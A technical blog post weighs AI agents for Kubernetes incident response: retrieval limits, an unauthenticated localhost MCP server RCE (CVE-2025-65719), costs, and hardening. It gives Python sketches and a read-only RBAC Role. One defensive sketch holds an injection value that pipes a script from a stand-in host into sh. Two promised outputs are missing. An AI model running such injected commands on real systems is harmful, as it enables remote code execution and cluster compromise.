I Gave an AI Agent kubectl Access to My Cluster. Here's What Nobody Tells You About AI SRE

#ai #kubernetes #devops #security

TL;DR: An AI agent can genuinely help during an incident, but the demos skip the three hard parts: it only reasons as well as the telemetry it can retrieve, it can only fix anything if you give it write access, and the exact "give your agent kubectl" pattern everyone is copying just shipped a critical RCE (CVE-2025-65719) where one webpage visit compromises the whole cluster. Here's where the line actually is.

The demo that made me try it

You've seen the demo by now. Someone pastes an alert into a chat box, an agent fans out across logs and metrics, and thirty seconds later it says "the checkout latency spike started at 14:32, right after commit abc123 shipped a bad session-cache change, here's the rollback." The room claps.

I wanted that. I run on-call for production Kubernetes, and the 3 AM "which of forty services is actually on fire" problem is real. So I wired an agent into a cluster with an MCP server, gave it the usual read access, and started throwing incidents at it.

It's useful. I'll say that up front so nobody thinks this is a hit piece. But the gap between the demo and a thing you'd trust in production is enormous, and it's made of three walls the demos never show you.

Wall 1: The agent is only as smart as the telemetry it can reach

Here's the part the marketing quietly skips. An "AI SRE" isn't magic reasoning. It's an LLM doing retrieval-augmented generation over your data: logs, metrics, recent deploys, runbooks, and a service topology that says "checkout calls payment-gateway calls auth-db." Retrieve that context, inject it into the prompt, get a cited answer back.
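To make "retrieve that context, inject it into the prompt" concrete, here is a toy sketch of the loop. It assumes a keyword-overlap ranker standing in for real vector search, and the `Doc`, `retrieve`, and `build_prompt` names are hypothetical, not any vendor's API. The corpus entries are made up for illustration.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Doc:
    source: str  # hypothetical identifier, e.g. a runbook path or log stream
    text: str


def retrieve(query: str, corpus: list[Doc], k: int = 2) -> list[Doc]:
    """Rank docs by shared query words (a toy stand-in for vector search)."""
    words = set(query.lower().split())
    scored = [(len(words & set(d.text.lower().split())), d) for d in corpus]
    ranked = sorted(scored, key=lambda pair: pair[0], reverse=True)
    # Drop documents with no overlap at all instead of padding the prompt.
    return [d for score, d in ranked[:k] if score > 0]


def build_prompt(query: str, context: list[Doc]) -> str:
    """Inject retrieved context with numbered sources so the answer can cite them."""
    lines = [f"[{i}] ({d.source}) {d.text}" for i, d in enumerate(context, start=1)]
    return (
        "Answer using only the numbered sources and cite them.\n"
        + "\n".join(lines)
        + f"\nQuestion: {query}"
    )


# Illustrative corpus, not real telemetry.
corpus = [
    Doc("deploys", "checkout deploy changed session cache at 14:31"),
    Doc("metrics", "checkout latency spike began 14:32"),
    Doc("runbook", "auth-db failover procedure"),
]
question = "why did checkout latency spike"
prompt = build_prompt(question, retrieve(question, corpus))
print(prompt)
```

Notice what the model never sees: anything the retriever didn't return. If the relevant deploy record isn't in the corpus, or the runbook in there is stale, the prompt is wrong before the model reads a word.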

incident.io, who sell one of these, are refreshingly blunt about it: without RAG anchoring the model to your specific infrastructure, "you're getting pattern-matched guesses, not investigated findings." That's the whole ballgame. The agent's ceiling is your observability, not the model.

Now look at your actual stack. Are your runbooks current, or are half of them a Confluence page last touched in 2023? Is there a real service catalog encoding dependencies, or does that graph live in one senior engineer's head? Are deploys correlated with metrics anywhere a machine can query, or do you eyeball Datadog next to GitHub in two tabs?

For most teams the honest answer is "partial, stale, and scattered." Feed that to an LLM and you don't get "I don't know." You get a confident, well-written root cause that's wrong, with citations to the stalest doc in the pile. The failure mode of a bad AI SRE isn't silence. It's plausible fiction at 3 AM, which is worse than no answer because it sends you chasing the wrong fix.

So the real prerequisite for AI SRE isn't a subscription. It's observability hygiene you probably haven't finished. If your telemetry is a mess, the agent industrializes that mess.

Wall 2: To fix anything, it needs hands. That's where it gets dangerous.

Reading is safe. The moment the demo gets exciting is the moment the agent stops suggesting a rollback and starts doing one. That requires write access to your cluster: kubectl apply, kubectl rollout undo, kubectl scale. Real credentials, real blast radius.

The common way to grant that today is an MCP server, a small process that exposes cluster operations as tools an AI assistant can call from a natural-language conversation. And in May 2026, OX Security published details of CVE-2025-65719: a critical remote code execution in the popular kubectl-mcp-server project, affecting all versions below 1.2.0.

The attack is almost insultingly simple, and it's worth understanding because it generalizes:

1. Your engineer has the MCP server running in the background on their laptop. Normal. That's how they let their assistant talk to the cluster.
2. In the vulnerable versions, the server listens on localhost without authentication and shells out to run commands through Python's subprocess with shell=True.
3. The engineer visits a malicious webpage. Just visits it. The page's JavaScript POSTs to localhost, hits the MCP server, and injects arbitrary shell commands.
4. Those commands run on the laptop, with that laptop's kubeconfig. Full cluster compromise: secrets, ConfigMaps, service accounts, the ability to deploy malicious pods and pivot into the rest of your cloud.
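The shell=True step is the one that generalizes, so here is a minimal sketch of the difference. This is not the project's actual code. The allow-list, the name pattern, and the function names are assumptions made up for illustration.

```python
import re

# Hypothetical allow-list; a real server would define its own.
ALLOWED_VERBS = {"get", "describe", "logs"}
# Lowercase names only, and no leading dash, so input can't pose as a flag.
SAFE_NAME = re.compile(r"[a-z0-9][a-z0-9./-]*")


def unsafe_command(resource: str) -> str:
    """The risky shape: one string that a shell parses (as with shell=True)."""
    return f"kubectl get {resource}"


def safe_argv(verb: str, resource: str) -> list[str]:
    """Safer shape: validate first, then build a list for subprocess.run(argv)."""
    if verb not in ALLOWED_VERBS:
        raise ValueError(f"verb not allowed: {verb!r}")
    if not SAFE_NAME.fullmatch(resource):
        raise ValueError(f"suspicious resource name: {resource!r}")
    return ["kubectl", verb, resource]


payload = "pods; curl evil.example | sh"

# Handed to a shell, this is two commands, and the attacker picked the second.
print(unsafe_command(payload))

try:
    safe_argv("get", payload)
except ValueError as err:
    print("rejected:", err)

# With an argument list and no shell, metacharacters are never interpreted.
print(safe_argv("get", "pods"))
```

Validation plus an argument list closes the injection path, but it does nothing about the missing authentication. Both problems had to exist for a webpage to reach the cluster.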

Sit with the shape of that. You didn't get phished into typing credentials. You didn't run a bad binary. You browsed the web while a helpful little server sat on localhost holding the keys to production. The disclosure timeline is its own lesson: reported November 2025, patched January 2026, publicly detailed in May 2026. There was a long window where a lot of clusters were one bad tab away from takeover.

The point isn't "this one project was sloppy," though shell=True on an unauthenticated localhost listener is genuinely rough. The point is structural. The instant you give an agent hands, you create a new attack surface, and it usually lives on an engineer's laptop next to their browser and their cluster credentials. Every tool that grants write access is a candidate for the same class of bug. CVE-2025-65719 is just the first one with a catchy number.

Wall 3: The economics only work for the boring half

Say your telemetry is clean and you've locked the access down. Does the math work?

It depends entirely on which job you're buying. The two halves of "AI SRE" have wildly different returns:

Investigation and documentation: This is real, measurable ROI today. Auto-drafting a post-mortem turns roughly 90 minutes of Slack-scrollback reconstruction into about 10 minutes of editing. Correlating a metric spike with the deploy that caused it, with a citation you can verify in 30 seconds, genuinely compresses time-to-identify. If your team runs 18 incidents a month, the post-mortem savings alone are real hours.
Autonomous remediation: This is where the demos live and the value doesn't. Even the vendors selling it will tell you, if you read past the headline, that autonomous production action "remains limited" and needs a human in the loop.
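For the investigation half, the post-mortem arithmetic is easy to check. This sketch uses only the figures quoted above and assumes, for simplicity, that every one of the 18 incidents gets a post-mortem.

```python
MINUTES_MANUAL = 90        # reconstructing the timeline from Slack scrollback
MINUTES_ASSISTED = 10      # editing an auto-drafted post-mortem
INCIDENTS_PER_MONTH = 18   # the example team above

# Assumption: one post-mortem per incident.
saved_minutes = (MINUTES_MANUAL - MINUTES_ASSISTED) * INCIDENTS_PER_MONTH
saved_hours = saved_minutes / 60

print(f"{saved_minutes} minutes, about {saved_hours:.0f} hours a month")
# prints "1440 minutes, about 24 hours a month"
```

That is roughly three working days a month of engineer time, before counting any improvement in time-to-identify.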

And the running cost isn't trivial. These agents burn tokens fanning out across large log corpora, and observability data volume is the real cost driver, not seat licenses. One publicly discussed multi-agent SRE setup was reported to run close to €8,500 a month in production (see the r/sre write-ups). Vendors are quiet about absolute numbers for a reason. You're paying for the agent and for keeping enough clean telemetry queryable for it to be worth anything.

So the honest framing: you're mostly paying real money to automate investigation and paperwork, which is worth it, while the part that looked like the future stays behind a human approval gate.

Where it actually earns its keep

I don't want to leave you with "AI SRE is fake." It isn't. It's just narrower than the pitch. After running it against real incidents, here's where it consistently pays off:

Triage and severity classification. "Database CPU High" might be a P1 or a scheduled backup. An agent with access to past incidents and service context routes that correctly and cuts pages.
Parallel root-cause correlation. It tests several hypotheses at once across the full log history, something you do sequentially and slowly at 3 AM. It surfaces the likely culprit; you verify.
Post-mortem and timeline drafting. The single most reliable win. Let it reconstruct the timeline from alerts, deploys, and chat, then you edit.

The mental model that survives contact with production is the "glass box." A black box says "the root cause is a memory leak in auth-service" and you have no idea why it thinks that. A glass box says "based on this log line at 14:31 showing auth-service memory at 98%, correlated with this commit that changed session caching, the likely cause is the cache not evicting" with both sources linked. You verify in half a minute. If a vendor can't show the citation trail, walk away.
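One way to hold a tool to the glass-box standard is to refuse any finding that arrives without sources. A minimal sketch, assuming hypothetical `Evidence` and `Finding` types and placeholder references rather than any real product's schema:

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Evidence:
    kind: str       # e.g. "log" or "commit"
    reference: str  # placeholder for a link a human can open
    summary: str


@dataclass(frozen=True)
class Finding:
    hypothesis: str
    evidence: tuple[Evidence, ...] = ()

    def is_glass_box(self, min_sources: int = 2) -> bool:
        """True only if enough distinct sources back the hypothesis."""
        return len({e.reference for e in self.evidence}) >= min_sources


black_box = Finding("memory leak in auth-service")

glass_box = Finding(
    "session cache is not evicting",
    (
        Evidence("log", "log-ref-1", "auth-service memory at 98% at 14:31"),
        Evidence("commit", "commit-ref-1", "changed session caching"),
    ),
)

for finding in (black_box, glass_box):
    verdict = "show to on-call" if finding.is_glass_box() else "discard"
    print(f"{finding.hypothesis}: {verdict}")
```

The threshold of two sources is arbitrary. The point is that a hypothesis with no citation trail never reaches the person holding the pager.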

Here's that pattern on a real cluster I broke on purpose. A read-only agent pulls the symptom, the warning event, and the change that caused it, then hands you a hypothesis you can check against the actual commit:

And the operating pattern that keeps you safe is three steps, not one:

The agent proposes with evidence. A human approves. Then the action executes through a scoped, audited path. AI drafts the rollback PR; you click the button. Never let the middle step disappear, no matter how good the suggestions get.
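Propose, approve, execute is small enough to sketch as a state machine. Everything here is hypothetical (the `Action` type, the reviewer name, the evidence reference), and the executor is stubbed out so that no command actually runs.

```python
from dataclasses import dataclass
from enum import Enum
from typing import Optional


class State(Enum):
    PROPOSED = "proposed"
    APPROVED = "approved"
    EXECUTED = "executed"


@dataclass
class Action:
    command: list[str]
    evidence: list[str]
    state: State = State.PROPOSED
    approved_by: Optional[str] = None


def approve(action: Action, human: str) -> None:
    """A human signs off, and only if there is evidence to review."""
    if not action.evidence:
        raise ValueError("no evidence attached; nothing to review")
    action.state, action.approved_by = State.APPROVED, human


def execute(action: Action, audit_log: list[str]) -> None:
    """Refuse any write that skipped the approval step, and log the ones that pass."""
    if action.state is not State.APPROVED:
        raise PermissionError("write blocked: no human approval")
    audit_log.append(f"{action.approved_by} approved {' '.join(action.command)}")
    action.state = State.EXECUTED  # a real executor would run the command here


audit: list[str] = []
rollback = Action(
    ["kubectl", "rollout", "undo", "deployment/checkout"],
    evidence=["deploy-ref-1"],
)

try:
    execute(rollback, audit)  # the agent tries to skip the middle step
except PermissionError as err:
    print(err)

approve(rollback, "oncall-engineer")
execute(rollback, audit)
print(audit)
```

The design choice worth copying is that `execute` checks the state itself. The gate lives in the write path, not in the agent's good manners.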

If you're going to do this anyway, do this

You probably are going to try it, so here's the short list that keeps it from becoming CVE-2025-65719 in your environment:

Read-only by default. The agent's service account should be granted the get, list, and watch verbs and nothing else until you have a specific reason otherwise. A minimal Role:

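```yaml
# Namespaced Role: read-only access to workload objects in production.
apiVersion: rbac.authorization.k8s.io/v1
kind: Role
metadata:
  name: ai-sre-readonly
  namespace: production
rules:
  # "" is the core API group (pods, events); "apps" covers deployments and replicasets.
  - apiGroups: ["", "apps"]
    resources: ["pods", "deployments", "events", "replicasets"]
    # No create, update, patch, or delete, and no access to secrets.
    verbs: ["get", "list", "watch"]
```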

Bind that to a dedicated ai-sre-readonly ServiceAccount. No create, update, delete, patch. No read access to secrets unless you truly need it, and if you do, scope it to named resources. kubectl auth can-i makes the boundary concrete, and this is the actual output from that service account:
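The block that follows is not that captured output. It is a minimal sketch of how the same check could be scripted, assuming kubectl is on the PATH, the Role is bound to the ServiceAccount in the production namespace, and your own user is allowed to impersonate it. The EXPECTED table is one reading of the Role above, not a recorded result, and `can_i` is defined but deliberately not called so the sketch runs without a cluster.

```python
import subprocess

NAMESPACE = "production"             # namespace from the Role above
SERVICE_ACCOUNT = "ai-sre-readonly"  # ServiceAccount name from the text


def can_i_argv(verb: str, resource: str) -> list[str]:
    """Build a `kubectl auth can-i` call that impersonates the agent's account."""
    subject = f"system:serviceaccount:{NAMESPACE}:{SERVICE_ACCOUNT}"
    return ["kubectl", "auth", "can-i", verb, resource,
            "--as", subject, "-n", NAMESPACE]


def can_i(verb: str, resource: str) -> bool:
    """Run the check against a live cluster; kubectl answers "yes" or "no"."""
    result = subprocess.run(can_i_argv(verb, resource),
                            capture_output=True, text=True)
    return result.stdout.strip() == "yes"


# What the Role should allow and deny if it is bound as described (assumption).
EXPECTED = {
    ("list", "pods"): True,
    ("get", "deployments"): True,
    ("get", "secrets"): False,
    ("delete", "pods"): False,
}

for (verb, resource), allowed in EXPECTED.items():
    print(" ".join(can_i_argv(verb, resource)), "-> expect", "yes" if allowed else "no")
```

Against a real cluster you would compare `can_i(verb, resource)` to each expected value and fail loudly on any mismatch, ideally in CI so a widened Role gets caught at review time.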

Never expose the MCP server to the network. Bind to localhost only, require authentication or an API key even locally, and treat any "direct web access" convenience feature as a liability. The whole CVE hinged on an unauthenticated localhost listener a webpage could reach.
Patch and pin. If you're on kubectl-mcp-server, be on 1.2.0 or later. Treat MCP servers like any other privileged dependency: watch their advisories, pin versions, scan them.
Keep the human approval gate for every write. Propose, approve, execute. Put writes behind a PR or an explicit confirmation, and log every action to an audit trail with the citations that justified it.
Fix observability first. If your runbooks are stale and your topology lives in someone's head, spend the money there before you spend it on an agent. The agent multiplies whatever data quality you already have, in both directions.
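On "require authentication even locally": binding to 127.0.0.1 stops other machines, but it does not stop the browser running on the same laptop. A minimal sketch of a per-request check for a local listener, assuming a hypothetical bearer token shared with the local client and header names passed in exactly as spelled here:

```python
import hmac

ALLOWED_HOSTS = {"127.0.0.1", "localhost"}


def is_request_allowed(headers: dict[str, str], expected_token: str) -> bool:
    """Reject browser-originated and unauthenticated requests to a local listener."""
    # Browsers attach Origin to cross-site POSTs; a local CLI client normally does not.
    if headers.get("Origin"):
        return False
    # An unexpected Host value suggests the request was aimed here by a page
    # using a hostname the attacker controls.
    host = headers.get("Host", "").split(":")[0]
    if host not in ALLOWED_HOSTS:
        return False
    supplied = headers.get("Authorization", "")
    # Constant-time comparison so the token can't be guessed byte by byte.
    return hmac.compare_digest(supplied.encode(), f"Bearer {expected_token}".encode())


token = "example-token"  # placeholder; generate a random one per install

from_browser = {"Host": "127.0.0.1:8080", "Origin": "https://evil.example"}
from_client = {"Host": "127.0.0.1:8080", "Authorization": f"Bearer {token}"}

print(is_request_allowed(from_browser, token))
print(is_request_allowed(from_client, token))
```

Treat this as the floor, not the design. The token still has to live somewhere a webpage can't read, and none of it replaces running a patched version.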

The actual takeaway

"AI SRE" isn't a colleague you hire. It's a very fast, very literal junior engineer who reads every log in milliseconds, has no intuition, will state a wrong answer with total confidence, and, if you're careless, hands its cluster credentials to the first website you visit.

Point it at investigation and documentation, keep it in a glass box, make it propose while a human approves, and scope its access like you'd scope a service you don't trust, because you shouldn't. Do that and it's a real force multiplier on the worst night of your quarter. Skip it and you've built a confident fiction generator with root on your cluster.

The technology is further along than the skeptics think and much further from autonomous than the demos imply. The engineering job, same as it ever was, is knowing exactly where that line sits.
